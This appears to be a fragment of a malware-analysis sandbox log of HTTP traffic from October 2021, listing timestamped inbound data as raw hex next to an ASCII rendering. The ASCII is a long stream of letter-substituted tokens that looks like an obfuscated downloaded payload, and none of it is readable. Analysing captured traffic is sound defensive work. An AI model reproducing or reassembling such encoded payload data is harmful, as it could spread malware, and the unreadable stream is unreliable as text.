                                                                                                2021-10-26 15:35:14 UTC5091INData Raw: 69 20 54 54 50 20 70 4f 20 54 6e 20 50 53 20 69 55 20 50 70 20 4d 67 4d 20 55 69 20 54 53 53 20 4f 50 20 54 53 6e 20 4f 53 20 6e 70 20 53 20 50 54 20 67 55 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 54 4d 53 20 54 4d 4d 20 50 69 20 6e 69 20 50 4d 20 54 54 6e 20 54 53 4f 20 54 54 67 20 69 4f 20 53 20 50 70 20 50 69 20 6e 6e 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 67 20 6e 4f 20 54 54 54 20 55 55 20 54 4d 69 20 55 70 20 4f 67 20 67 55 20 50 54 20 50 69 20 4f 69 20 70 20 50 54 20 54 53 4f 20 54 54 4d 20 50 54 20 4d 69 20 54 6e 54 20 50 69 20 55 69 20 54 54 70 20 4f 50 20 6e 50 20 4f 54 20 4d 4d 67 20 69 55 20 50 53 20 50 69 20 55 6e 20 70 70 20 54 4d 6e 20 54 53 4f 20 54 53 53 20 50 53 20 69
                                                                                                Data Ascii: i TTP pO Tn PS iU Pp MgM Ui TSS OP TSn OS np S PT gU Ui TTi TTn TSO TTM PS TMS TMM Pi ni PM TTn TSO TTg iO S Pp Pi nn TTi TTn TSO TTM PS iU PS Pg nO TTT UU TMi Up Og gU PT Pi Oi p PT TSO TTM PT Mi TnT Pi Ui TTp OP nP OT MMg iU PS Pi Un pp TMn TSO TSS PS i
                                                                                                2021-10-26 15:35:14 UTC5092INData Raw: 20 54 6e 54 20 54 53 4f 20 4f 53 20 69 4f 20 70 53 20 50 54 20 67 55 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 54 55 50 20 54 55 6e 20 50 69 20 55 55 20 50 4d 20 54 54 6e 20 54 53 4f 20 54 54 67 20 67 67 20 53 20 50 69 20 50 69 20 4d 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 50 6e 20 50 53 20 69 55 20 67 50 20 6e 4d 20 69 4d 20 54 54 69 20 54 54 6e 20 54 53 50 20 54 54 69 20 54 55 20 54 70 54 20 4d 53 20 4d 67 53 20 6e 69 20 4f 53 20 54 67 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 69 20 4d 54 4f 20 50 69 20 55 69 20 54 4d 53 20 4f 67 20 54 4f 6e 20 54 54 4d 20 50 53 20 50 55 20 69 53 20 4d 6e 20 4f 50 20 55 69 20 54 54 50 20 70 4f 20 4d 4d 4d 20 50 53 20 69 55 20 50 70 20 4d 6e 20 4f 50 20 55 4f 20 54 54 55 20 54 53 67 20 4f 54
                                                                                                Data Ascii: TnT TSO OS iO pS PT gU Ui TTi TTn TSO TTM PS TUP TUn Pi UU PM TTn TSO TTg gg S Pi Pi Mi TTi TTn TSO Pn PS iU gP nM iM TTi TTn TSP TTi TU TpT MS MgS ni OS TgU TSO TTM PM Mi MTO Pi Ui TMS Og TOn TTM PS PU iS Mn OP Ui TTP pO MMM PS iU Pp Mn OP UO TTU TSg OT
                                                                                                2021-10-26 15:35:14 UTC5093INData Raw: 50 54 20 67 55 20 55 69 20 54 54 69 20 54 54 4f 20 54 53 4f 20 54 53 53 20 50 53 20 54 55 4f 20 54 69 6e 20 50 69 20 55 67 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 69 54 20 53 20 50 69 20 50 69 20 4d 69 6e 20 54 54 69 20 54 54 6e 20 54 53 4f 20 50 4f 20 50 53 20 69 55 20 67 50 20 6e 4d 20 67 53 20 54 54 69 20 54 54 6e 20 54 53 50 20 54 53 50 20 67 54 20 50 6e 20 4d 53 20 70 4d 20 54 4d 69 20 4d 50 54 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 50 20 50 54 20 70 4d 20 4d 4f 20 54 70 54 20 54 54 4d 20 4f 67 20 4d 69 20 54 54 4d 20 50 53 20 50 55 20 67 53 20 50 54 20 54 67 6e 20 4d 69 67 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 69 55 20 54 70 20 54 54 67 20 54 70 20 54 67 4d 20 54 53 55 20 4f 67 20 54 69 70 20 54 54 4d 20 50 53 20 50 69 20 6e 70 20 6e
                                                                                                Data Ascii: PT gU Ui TTi TTO TSO TSS PS TUO Tin Pi Ug TTi TTn TSO TTM iT S Pi Pi Min TTi TTn TSO PO PS iU gP nM gS TTi TTn TSP TSP gT Pn MS pM TMi MPT TTn TSO TMM MP PT pM MO TpT TTM Og Mi TTM PS PU gS PT Tgn Mig TTn TSO TTM iU Tp TTg Tp TgM TSU Og Tip TTM PS Pi np n
                                                                                                2021-10-26 15:35:14 UTC5095INData Raw: 20 50 53 20 50 69 20 4f 69 20 54 6e 4d 20 54 54 55 20 54 53 4d 20 4f 54 20 4d 54 53 20 67 69 20 69 55 20 67 53 20 50 69 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 67 20 54 50 54 20 4d 67 55 20 70 53 20 67 70 20 55 70 20 54 69 53 20 4f 4f 20 4f 4f 20 54 54 4d 20 50 53 20 69 67 20 4f 67 20 55 50 20 55 69 20 54 54 69 20 54 4d 6e 20 54 6e 6e 20 4f 53 20 50 53 20 69 4f 20 69 70 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 55 55 20 54 54 4d 20 70 53 20 54 54 50 20 50 53 20 4d 55 20 54 55 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 54 69 20 50 53 20 50 70 20 50 53 20 6e 53 20 69 69 20 54 54 69 20 54 4d 67 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 69 54 20 70 20 55 53 20 54 54 69 20 4d 67 70 20 54 53 4f 20 54 54 4d 20 50 53 20 54 4d 50 20 50 53 20 50 69 20 70 4f
                                                                                                Data Ascii: PS Pi Oi TnM TTU TSM OT MTS gi iU gS Pi TTi TTn TSg Og TPT MgU pS gp Up TiS OO OO TTM PS ig Og UP Ui TTi TMn Tnn OS PS iO ip Pi Ui TTi TTn UU TTM pS TTP PS MU TU TTi TTn TSU TTi PS Pp PS nS ii TTi TMg TSO TTM PS iU iT p US TTi Mgp TSO TTM PS TMP PS Pi pO
                                                                                                2021-10-26 15:35:14 UTC5099INData Raw: 69 20 54 54 69 20 54 54 50 20 67 53 20 54 50 69 20 50 53 20 69 55 20 50 70 20 67 53 20 54 4f 54 20 54 54 69 20 54 54 6e 20 54 53 67 20 55 70 20 4d 69 20 54 6e 55 20 50 53 20 50 50 20 70 55 20 54 54 69 20 54 54 6e 20 54 54 54 20 54 54 4d 20 54 69 20 69 55 20 4d 70 20 55 4d 20 55 69 20 54 54 6e 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 67 20 4d 20 50 53 20 55 69 20 4d 50 54 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 54 4d 6e 20 69 55 20 50 53 20 67 4f 20 69 4d 20 6e 4d 20 54 54 6e 20 54 53 4f 20 54 54 70 20 54 54 20 6e 55 20 50 53 20 50 69 20 55 69 20 54 4d 20 6e 4f 20 54 53 4f 20 54 54 4d 20 50 69 20 4f 50 20 54 53 55 20 50 69 20 55 69 20 54 4d 53 20 4f 70 20 70 69 20 54 54 50 20 4d 53 20 4d 6e 20 54 53 67 20 50 55 20 54 4d 6e 20 54 67 6e 20 54 53 67
                                                                                                Data Ascii: i TTi TTP gS TPi PS iU Pp gS TOT TTi TTn TSg Up Mi TnU PS PP pU TTi TTn TTT TTM Ti iU Mp UM Ui TTn TTn TSO TTM PS ig M PS Ui MPT TTn TSO TTM TMn iU PS gO iM nM TTn TSO TTp TT nU PS Pi Ui TM nO TSO TTM Pi OP TSU Pi Ui TMS Op pi TTP MS Mn TSg PU TMn Tgn TSg
                                                                                                2021-10-26 15:35:14 UTC5103INData Raw: 20 70 4f 20 54 4f 6e 20 50 53 20 69 55 20 50 4d 20 6e 4d 20 69 67 20 54 54 69 20 54 54 6e 20 54 53 67 20 55 55 20 54 67 50 20 69 55 20 50 53 20 69 55 20 54 4d 70 20 55 69 20 4f 69 20 4d 54 54 20 55 70 20 4d 50 20 4d 4d 4f 20 4d 53 20 4d 4f 20 54 67 6e 20 54 54 69 20 54 54 6e 20 54 4d 70 20 70 69 20 69 4f 20 69 55 20 54 4f 6e 20 50 69 20 55 69 20 54 54 69 20 67 4d 20 54 53 4f 20 54 54 4d 20 67 50 20 6e 55 20 54 54 50 20 50 69 20 55 69 20 54 54 55 20 55 55 20 54 53 67 20 54 69 20 54 54 69 20 69 55 20 50 53 20 50 53 20 54 53 4f 20 54 50 54 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 69 55 20 4f 50 20 4d 20 50 50 20 55 69 20 54 4d 53 20 54 54 53 20 70 69 20 55 4d 20 4d 53 20 6e 4f 20 54 4d 20 50 69 20 55 69 20 54 54 55 20 4f 67 20 4f 4d 20 54 54 67 20 50 53 20 50
                                                                                                Data Ascii: pO TOn PS iU PM nM ig TTi TTn TSg UU TgP iU PS iU TMp Ui Oi MTT Up MP MMO MS MO Tgn TTi TTn TMp pi iO iU TOn Pi Ui TTi gM TSO TTM gP nU TTP Pi Ui TTU UU TSg Ti TTi iU PS PS TSO TPT TTn TSO TTM iU OP M PP Ui TMS TTS pi UM MS nO TM Pi Ui TTU Og OM TTg PS P
                                                                                                2021-10-26 15:35:14 UTC5104INData Raw: 4f 67 20 55 69 20 54 54 4f 20 54 53 6e 20 67 54 20 54 69 6e 20 69 4f 20 50 53 20 69 55 20 54 4d 70 20 54 4d 53 20 4f 69 20 54 50 4d 20 54 54 4d 20 50 53 20 67 50 20 4d 20 69 55 20 55 69 20 54 53 50 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 54 53 54 20 69 55 20 50 53 20 67 4f 20 55 6e 20 54 54 55 20 54 54 4d 20 4f 4f 20 54 54 70 20 70 53 20 50 67 20 4d 70 20 4d 70 20 55 50 20 54 54 69 20 54 54 50 20 54 54 70 20 4f 67 20 50 4f 20 4d 4d 20 69 55 20 69 55 20 50 4f 20 4d 54 54 20 54 54 70 20 54 53 4f 20 54 54 55 20 4d 69 20 50 55 20 4d 50 20 54 4f 50 20 55 69 20 4f 6e 20 70 4f 20 54 53 6e 20 54 54 4d 20 50 20 69 55 20 50 53 20 50 69 20 70 6e 20 54 54 69 20 54 54 6e 20 54 4d 69 20 54 53 53 20 67 6e 20 4d 4f 20 67 69 20 54 70 20 69 4d 20 6e 50 20 54 54 6e 20 54 53
                                                                                                Data Ascii: Og Ui TTO TSn gT Tin iO PS iU TMp TMS Oi TPM TTM PS gP M iU Ui TSP TTn TSO TTM TST iU PS gO Un TTU TTM OO TTp pS Pg Mp Mp UP TTi TTP TTp Og PO MM iU iU PO MTT TTp TSO TTU Mi PU MP TOP Ui On pO TSn TTM P iU PS Pi pn TTi TTn TMi TSS gn MO gi Tp iM nP TTn TS
                                                                                                2021-10-26 15:35:14 UTC5108INData Raw: 54 53 67 20 54 53 55 20 55 55 20 54 50 20 69 4f 20 50 53 20 70 53 20 54 4d 69 20 50 50 20 54 54 70 20 54 53 4f 20 54 54 55 20 4f 69 20 6e 20 67 4f 20 4d 4f 20 55 67 20 4d 69 4d 20 50 4f 20 54 53 4f 20 54 54 4d 20 50 69 20 4d 6e 20 4d 67 55 20 6e 4d 20 4d 67 20 54 54 69 20 54 54 6e 20 54 53 50 20 67 54 20 54 69 50 20 69 4f 20 50 53 20 69 55 20 54 4d 6e 20 54 54 4f 20 4f 67 20 54 4d 4d 20 54 54 67 20 50 53 20 50 69 20 4d 69 20 67 6e 20 54 53 53 20 54 54 67 20 54 54 6e 20 55 69 20 54 54 4d 20 50 53 20 69 55 20 54 54 53 20 50 69 20 55 69 20 4f 4f 20 55 50 20 6e 6e 20 70 4d 20 50 53 20 69 55 20 4d 70 20 4d 67 4d 20 55 69 20 54 54 69 20 54 4d 6e 20 6e 6e 20 54 54 67 20 50 53 20 69 55 20 54 6e 55 20 69 69 20 54 4d 54 20 54 4d 53 20 55 67 20 70 4f 20 6e 4f 20 50
                                                                                                Data Ascii: TSg TSU UU TP iO PS pS TMi PP TTp TSO TTU Oi n gO MO Ug MiM PO TSO TTM Pi Mn MgU nM Mg TTi TTn TSP gT TiP iO PS iU TMn TTO Og TMM TTg PS Pi Mi gn TSS TTg TTn Ui TTM PS iU TTS Pi Ui OO UP nn pM PS iU Mp MgM Ui TTi TMn nn TTg PS iU TnU ii TMT TMS Ug pO nO P
                                                                                                2021-10-26 15:35:14 UTC5112INData Raw: 20 55 4d 20 55 55 20 54 4d 6e 20 6e 53 20 54 69 70 20 67 67 20 53 20 50 55 20 50 69 20 54 53 55 20 54 54 69 20 54 54 6e 20 54 53 4f 20 4d 67 20 50 53 20 69 55 20 67 50 20 50 67 20 55 53 20 54 54 4f 20 4f 67 20 69 67 20 54 54 4d 20 50 53 20 50 69 20 69 53 20 4d 6e 20 54 54 50 20 55 69 20 54 54 20 4d 67 50 20 54 54 4d 20 50 53 20 50 4d 20 67 6e 20 69 70 20 6e 4f 20 54 53 70 20 4d 69 55 20 67 54 20 54 54 4d 20 50 53 20 69 4f 20 67 6e 20 4d 6e 20 6e 70 20 55 69 20 54 54 69 20 54 4d 67 20 54 54 69 20 54 4f 53 20 54 4d 53 20 50 53 20 50 69 20 55 50 20 4d 53 55 20 54 54 69 20 54 4d 4d 20 54 54 55 20 54 69 69 20 50 50 20 4d 70 20 54 69 4d 20 55 69 20 54 54 69 20 54 54 50 20 6e 54 20 54 4d 4d 20 4d 50 20 4d 67 54 20 50 6e 20 4d 4f 20 54 6e 55 20 54 54 67 20 70 4f
                                                                                                Data Ascii: UM UU TMn nS Tip gg S PU Pi TSU TTi TTn TSO Mg PS iU gP Pg US TTO Og ig TTM PS Pi iS Mn TTP Ui TT MgP TTM PS PM gn ip nO TSp MiU gT TTM PS iO gn Mn np Ui TTi TMg TTi TOS TMS PS Pi UP MSU TTi TMM TTU Tii PP Mp TiM Ui TTi TTP nT TMM MP MgT Pn MO TnU TTg pO
                                                                                                2021-10-26 15:35:14 UTC5116INData Raw: 20 54 53 67 20 67 54 20 4d 67 20 4d 53 20 4d 4d 20 4d 54 6e 20 54 69 4d 20 54 4f 55 20 67 50 20 4d 4d 20 55 6e 20 55 70 20 55 6e 20 55 53 20 50 53 20 4d 67 20 54 70 20 54 54 20 69 54 20 69 4f 20 67 4f 20 69 70 20 4d 6e 20 70 50 20 55 69 20 55 50 20 54 67 53 20 54 70 6e 20 54 4f 4f 20 4d 69 54 20 55 69 20 55 53 20 69 4f 20 4d 67 20 54 4f 20 54 54 20 4d 54 20 55 69 20 55 50 20 54 53 70 20 55 6e 20 54 4d 70 20 55 69 20 4f 69 20 54 55 70 20 55 70 20 4d 50 20 4d 54 6e 20 50 53 20 50 69 20 55 6e 20 70 70 20 54 4d 6e 20 54 53 4f 20 4f 50 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 54 54 20 54 53 4f 20 69 67 20 4d 4f 20 54 4f 20 54 70 20 55 6e 20 54 53 67 20 4f 55 20 70 69 20 54 54 53 20 4d 53 20 54 70 20 69 55 20 54 70 20 50 4d 20
                                                                                                Data Ascii: TSg gT Mg MS MM MTn TiM TOU gP MM Un Up Un US PS Mg Tp TT iT iO gO ip Mn pP Ui UP TgS Tpn TOO MiT Ui US iO Mg TO TT MT Ui UP TSp Un TMp Ui Oi TUp Up MP MTn PS Pi Un pp TMn TSO OP PS iU PS Pi Ui TTi TTn TTT TSO ig MO TO Tp Un TSg OU pi TTS MS Tp iU Tp PM
                                                                                                2021-10-26 15:35:14 UTC5120INData Raw: 67 54 20 54 54 4f 20 4d 53 20 67 67 20 6e 6e 20 4f 50 20 70 53 20 6e 50 20 54 54 55 20 67 70 20 70 6e 20 4f 6e 20 50 50 20 55 69 20 54 4d 53 20 4f 55 20 70 69 20 69 4f 20 4d 53 20 50 69 20 67 6e 20 54 54 54 20 70 70 20 4f 69 20 6e 4d 20 6e 50 20 54 54 4f 20 50 4d 20 4f 50 20 54 4d 50 20 50 50 20 55 69 20 54 4d 53 20 54 4d 54 20 6e 6e 20 54 69 70 20 54 50 55 20 67 54 20 4d 55 20 55 53 20 50 53 20 4d 67 20 54 4f 20 55 20 4d 4d 20 55 6e 20 55 50 20 55 69 20 55 53 20 69 4f 20 55 4d 20 54 53 50 20 4d 53 6e 20 50 67 20 4d 4d 67 20 55 70 20 55 6e 20 55 53 20 69 4f 20 4d 53 20 54 4f 20 55 20 4d 4d 20 55 6e 20 55 70 20 55 6e 20 55 6e 20 55 4f 20 54 4d 4d 20 55 4f 20 54 54 4f 20 4f 54 20 67 69 20 54 6e 70 20 54 53 6e 20 50 69 20 55 69 20 54 54 55 20 4f 69 20 4d 4d
                                                                                                Data Ascii: gT TTO MS gg nn OP pS nP TTU gp pn On PP Ui TMS OU pi iO MS Pi gn TTT pp Oi nM nP TTO PM OP TMP PP Ui TMS TMT nn Tip TPU gT MU US PS Mg TO U MM Un UP Ui US iO UM TSP MSn Pg MMg Up Un US iO MS TO U MM Un Up Un Un UO TMM UO TTO OT gi Tnp TSn Pi Ui TTU Oi MM
                                                                                                2021-10-26 15:35:14 UTC5124INData Raw: 53 20 50 53 20 50 4f 20 54 54 50 20 54 54 70 20 54 53 4f 20 54 54 55 20 67 50 20 70 67 20 55 55 20 55 4f 20 4d 20 54 54 50 20 54 54 6e 20 54 53 67 20 54 69 20 54 53 50 20 69 55 20 50 53 20 50 53 20 54 4d 53 20 54 4d 70 20 54 54 20 50 69 20 54 54 4d 20 50 53 20 50 4d 20 67 67 20 67 55 20 54 53 55 20 50 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 6e 70 20 54 53 55 20 50 53 20 50 69 20 55 53 20 54 53 67 20 6e 53 20 54 54 6e 20 54 69 20 54 53 69 20 69 55 20 50 53 20 50 53 20 50 4f 20 54 54 4d 20 54 54 70 20 54 53 4f 20 54 54 55 20 54 55 20 54 69 53 20 4d 69 4d 20 4d 53 54 20 54 6e 54 20 54 4f 20 54 53 53 20 4f 55 20 54 6e 20 4f 53 20 67 50 20 67 50 20 4d 4f 20 55 67 20 54 4d 20 69 54 20 54 53 4f 20 54 54 4d 20 50 69 20 67 50 20 67 50 20 67 4f 20 70 4f 20 4f 50 20
                                                                                                Data Ascii: S PS PO TTP TTp TSO TTU gP pg UU UO M TTP TTn TSg Ti TSP iU PS PS TMS TMp TT Pi TTM PS PM gg gU TSU P TTn TSO TTM np TSU PS Pi US TSg nS TTn Ti TSi iU PS PS PO TTM TTp TSO TTU TU TiS MiM MST TnT TO TSS OU Tn OS gP gP MO Ug TM iT TSO TTM Pi gP gP gO pO OP
                                                                                                2021-10-26 15:35:14 UTC5129INData Raw: 20 54 53 69 20 50 6e 20 50 67 20 4f 4d 20 69 67 20 54 67 4f 20 54 53 4d 20 54 54 67 20 50 53 20 50 54 20 67 70 20 70 20 54 67 54 20 54 54 6e 20 54 54 50 20 4d 4d 6e 20 4d 50 20 4d 55 20 67 50 20 50 67 20 54 55 6e 20 54 54 55 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 4d 50 20 50 4d 20 67 55 20 50 4f 20 67 4d 20 55 67 20 4f 53 20 69 67 20 54 53 55 20 54 54 4d 20 50 70 20 50 6e 20 50 70 20 69 55 20 54 4d 70 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 50 20 4d 20 50 6e 20 50 53 20 69 50 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 69 55 20 67 53 20 4d 54 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 54 69 20 69 50 20 67 4d 20 54 4f 54 20 54 6e 20 55 69 20 54 54 69 20 54 54 4f 20 54 54 4f 20 4f 67 20 69 4f 20 4d 4d 20 4d 53 20 4d
                                                                                                Data Ascii: TSi Pn Pg OM ig TgO TSM TTg PS PT gp p TgT TTn TTP MMn MP MU gP Pg TUn TTU TTi TTn TSU TMP PM gU PO gM Ug OS ig TSU TTM Pp Pn Pp iU TMp TTi TTn TSO TTP M Pn PS iP Ui TTi TTn TSO TTM PS iU iU gS MT TTi TTn TSg TTi iP gM TOT Tn Ui TTi TTO TTO Og iO MM MS M
                                                                                                2021-10-26 15:35:14 UTC5133INData Raw: 54 20 4d 53 20 50 69 20 67 53 20 54 4d 50 20 54 4d 6e 20 54 54 70 20 54 4d 70 20 6e 53 20 54 50 54 20 50 70 20 4d 6e 20 54 4f 4f 20 69 4f 20 54 4d 69 20 4d 67 67 20 54 54 6e 20 54 53 4f 20 54 54 55 20 69 4d 20 4d 4f 20 50 6e 20 54 70 20 4f 4d 20 4f 53 20 53 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 4f 20 50 6e 20 4d 4f 20 55 6e 20 54 4d 70 20 4f 69 20 54 50 55 20 54 4d 53 20 4d 70 20 67 55 20 50 54 20 50 69 20 55 4d 20 54 6e 4d 20 55 54 20 6e 4d 20 55 55 20 54 4d 70 20 69 55 20 50 53 20 70 53 20 55 4f 20 54 54 6e 20 4f 67 20 4d 69 54 20 54 54 4d 20 50 53 20 50 69 20 50 4f 20 4d 4d 20 54 70 53 20 55 4f 20 54 70 50 20 54 54 50 20 55 55 20 4d 53 50 20 69 55 20 50 53 20 69 55 20 54 4d 69 20 54 4f 55 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 70 20 55 54 20 50 53
                                                                                                Data Ascii: T MS Pi gS TMP TMn TTp TMp nS TPT Pp Mn TOO iO TMi Mgg TTn TSO TTU iM MO Pn Tp OM OS S TSO TTM Pp MO Pn MO Un TMp Oi TPU TMS Mp gU PT Pi UM TnM UT nM UU TMp iU PS pS UO TTn Og MiT TTM PS Pi PO MM TpS UO TpP TTP UU MSP iU PS iU TMi TOU TTn TSO TTU Mp UT PS
                                                                                                2021-10-26 15:35:14 UTC5136INData Raw: 54 69 20 55 4f 20 69 55 20 50 53 20 50 53 20 4d 54 55 20 54 4f 6e 20 4d 70 20 54 50 20 54 54 67 20 50 53 20 50 55 20 69 6e 20 4d 6e 20 54 54 55 20 55 69 20 54 54 20 70 20 54 54 4d 20 50 53 20 50 4d 20 67 50 20 50 54 20 4d 53 70 20 54 54 54 20 55 55 20 54 54 4f 20 55 70 20 6e 70 20 4f 4d 20 50 53 20 50 69 20 55 53 20 4f 4f 20 54 54 4d 20 4d 69 6e 20 54 4d 67 20 6e 70 20 6e 4f 20 50 53 20 50 69 20 4f 69 20 54 4d 70 20 4f 69 20 54 53 4d 20 4f 4f 20 50 69 20 4d 6e 20 4d 50 50 20 67 6e 20 55 54 20 55 4f 20 54 6e 69 20 4f 70 20 4f 54 20 4d 54 69 20 6e 55 20 4f 50 20 50 69 20 55 69 20 54 54 55 20 54 53 53 20 54 53 50 20 54 69 20 4f 50 20 69 55 20 50 53 20 50 53 20 4d 54 55 20 54 4f 6e 20 4d 70 20 54 50 20 54 54 67 20 50 53 20 50 55 20 54 70 55 20 50 55 20 4f 4d
                                                                                                Data Ascii: Ti UO iU PS PS MTU TOn Mp TP TTg PS PU in Mn TTU Ui TT p TTM PS PM gP PT MSp TTT UU TTO Up np OM PS Pi US OO TTM Min TMg np nO PS Pi Oi TMp Oi TSM OO Pi Mn MPP gn UT UO Tni Op OT MTi nU OP Pi Ui TTU TSS TSP Ti OP iU PS PS MTU TOn Mp TP TTg PS PU TpU PU OM
                                                                                                2021-10-26 15:35:14 UTC5140INData Raw: 20 54 54 50 20 54 54 6e 20 54 53 67 20 54 69 20 70 55 20 69 55 20 50 53 20 50 53 20 54 67 4d 20 4d 4d 6e 20 54 54 6e 20 54 53 4f 20 54 54 67 20 4d 70 20 54 54 55 20 50 53 20 50 69 20 4f 69 20 54 53 4f 20 54 4d 69 20 4d 20 4d 4f 20 50 54 20 69 55 20 50 70 20 6e 4d 20 67 69 20 54 54 69 20 54 54 6e 20 54 53 50 20 54 70 53 20 54 4d 54 20 69 55 20 50 53 20 50 50 20 54 4d 69 20 50 4d 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 69 50 20 50 55 20 4f 67 20 4f 54 20 55 50 20 54 54 69 20 54 4d 6e 20 54 4f 20 70 20 50 53 20 69 55 20 50 69 20 4d 67 53 20 4d 50 67 20 54 54 69 20 54 54 6e 20 54 53 55 20 55 55 20 54 54 70 20 69 55 20 50 53 20 70 53 20 6e 50 20 54 4d 54 20 4d 70 20 53 20 54 54 67 20 50 53 20 50 55 20 6e 70 20 70 69 20 55 69 20 54 54 69 20 54 54 67 20 54 55 4f
                                                                                                Data Ascii: TTP TTn TSg Ti pU iU PS PS TgM MMn TTn TSO TTg Mp TTU PS Pi Oi TSO TMi M MO PT iU Pp nM gi TTi TTn TSP TpS TMT iU PS PP TMi PM TTn TSO TMM iP PU Og OT UP TTi TMn TO p PS iU Pi MgS MPg TTi TTn TSU UU TTp iU PS pS nP TMT Mp S TTg PS PU np pi Ui TTi TTg TUO
                                                                                                2021-10-26 15:35:14 UTC5144INData Raw: 54 69 53 20 50 69 20 55 69 20 54 54 50 20 69 20 4d 54 54 20 54 54 4d 20 50 53 20 69 4f 20 4f 67 20 54 55 54 20 55 50 20 54 54 69 20 54 4d 6e 20 55 50 20 55 20 50 54 20 69 55 20 50 53 20 6e 4d 20 67 4f 20 54 54 69 20 54 54 6e 20 54 53 50 20 54 4d 70 20 50 69 20 67 67 20 50 50 20 54 6e 4d 20 69 50 20 4d 53 70 20 54 54 6e 20 54 53 4f 20 54 54 67 20 70 6e 20 54 69 53 20 50 53 20 50 69 20 55 50 20 4d 4f 20 4d 69 54 20 54 53 55 20 54 54 4d 20 50 70 20 55 20 54 53 69 20 50 50 20 55 69 20 54 54 69 20 54 54 20 67 53 20 54 54 4d 20 50 53 20 50 4d 20 70 53 20 50 53 20 70 4f 20 54 54 4f 20 4d 67 4f 20 4d 53 20 70 70 20 50 53 20 69 55 20 50 54 20 6e 54 20 54 53 4d 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 53 70 20 67 54 20 67 69 20 4d 53 20 67 70 20 4f 53 20 4f 53 20
                                                                                                Data Ascii: TiS Pi Ui TTP i MTT TTM PS iO Og TUT UP TTi TMn UP U PT iU PS nM gO TTi TTn TSP TMp Pi gg PP TnM iP MSp TTn TSO TTg pn TiS PS Pi UP MO MiT TSU TTM Pp U TSi PP Ui TTi TT gS TTM PS PM pS PS pO TTO MgO MS pp PS iU PT nT TSM TTi TTn TSU TSp gT gi MS gp OS OS
                                                                                                2021-10-26 15:35:14 UTC5148INData Raw: 20 50 69 20 55 50 20 4d 4f 20 69 70 20 54 53 4f 20 54 54 4d 20 50 70 20 55 20 67 53 20 50 4d 20 55 69 20 54 54 69 20 54 54 20 4d 69 20 54 54 4d 20 50 53 20 50 4d 20 6e 70 20 6e 54 20 55 69 20 54 54 69 20 54 54 67 20 4d 20 54 55 50 20 50 53 20 69 55 20 50 70 20 54 55 70 20 4d 69 20 54 54 69 20 54 54 6e 20 54 53 55 20 67 54 20 54 53 50 20 69 55 20 50 53 20 70 53 20 54 53 55 20 54 4d 69 20 54 54 4f 20 54 53 4f 20 54 54 4d 20 6e 70 20 70 4f 20 50 53 20 50 69 20 55 53 20 54 4d 20 69 20 54 53 4f 20 54 54 4d 20 50 69 20 4f 50 20 54 6e 53 20 50 50 20 55 69 20 54 4d 53 20 4d 69 4f 20 67 4d 20 54 54 4d 20 50 53 20 69 4f 20 4f 67 20 54 53 4f 20 55 69 20 54 54 69 20 54 4d 6e 20 55 50 20 54 4d 55 20 50 54 20 69 55 20 50 53 20 6e 4d 20 67 67 20 54 54 69 20 54 54 6e 20
                                                                                                Data Ascii: Pi UP MO ip TSO TTM Pp U gS PM Ui TTi TT Mi TTM PS PM np nT Ui TTi TTg M TUP PS iU Pp TUp Mi TTi TTn TSU gT TSP iU PS pS TSU TMi TTO TSO TTM np pO PS Pi US TM i TSO TTM Pi OP TnS PP Ui TMS MiO gM TTM PS iO Og TSO Ui TTi TMn UP TMU PT iU PS nM gg TTi TTn
                                                                                                2021-10-26 15:35:14 UTC5152INData Raw: 4d 67 20 4d 69 20 54 4d 70 20 50 69 20 55 69 20 54 4d 53 20 54 53 4d 20 54 53 70 20 54 54 50 20 6e 67 20 67 6e 20 50 53 20 50 69 20 55 53 20 4f 4f 20 54 54 69 20 6e 6e 20 4d 67 67 20 67 53 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 55 55 20 54 4d 4f 20 69 55 20 50 53 20 69 55 20 54 4d 69 20 54 4f 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 67 70 20 69 55 20 4d 69 20 55 4f 20 54 4f 50 20 50 54 20 54 53 50 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 6e 50 20 69 55 20 69 55 20 50 53 20 54 67 20 55 70 20 54 54 69 20 54 54 6e 20 6e 50 20 54 54 4d 20 50 53 20 69 55 20 54 54 70 20 50 69 20 55 69 20 54 54 50 20 54 53 4d 20 4f 67 20 54 54 70 20 50 53 20 4f 4f 20 50
                                                                                                Data Ascii: Mg Mi TMp Pi Ui TMS TSM TSp TTP ng gn PS Pi US OO TTi nn Mgg gS MMi ii gS TnT TTi TTn TSn UU TMO iU PS iU TMi TO TTn TSO TMM Mgp iU Mi UO TOP PT TSP TSO TTM PS iU PS Pi Ui TTi TTn TSO nP iU iU PS Tg Up TTi TTn nP TTM PS iU TTp Pi Ui TTP TSM Og TTp PS OO P
